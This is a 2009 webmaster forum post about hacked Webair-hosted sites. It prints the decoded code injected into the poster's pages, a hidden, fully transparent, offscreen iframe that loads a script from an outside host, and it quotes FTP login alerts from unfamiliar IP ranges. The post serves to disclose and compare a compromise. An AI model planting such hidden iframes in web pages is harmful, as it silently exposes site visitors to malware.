Thread: Anyone else had their Webair sites hacked yesterday?
View Single Post
Old 05-14-2009, 06:01 AM  
VladS
Available for Coding Work
 
VladS's Avatar
 
Industry Role:
Join Date: Jun 2008
Posts: 1,432
This is the first code that was injected on my sites: (decoded version)

Code:
<iframe width="480" height="60" src="http://download-123.cn/vtiadmin2/t.php" style="border:0px; position:relative; top:0px; left:-500px; opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); -moz-opacity:0"></iframe>
The FTP logs:

Quote:
CyberWurx login monitoring has detected the following account login from a new internet segment:

Date: Sat May 9 05:24:25 2009

FTP Logged in from:
Country: United States
Internet segment: 65.64.0.0/13
Internet Service Provider: SBIS-AS - SBC Internet Services
Quote:
CyberWurx login monitoring has detected the following account login from a new internet segment:

Date: Sun May 10 23:54:24 2009

FTP Logged in from:
Country: Germany
Internet segment: 81.169.144.0/20
Internet Service Provider: STRATO Strato AG
VladS is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote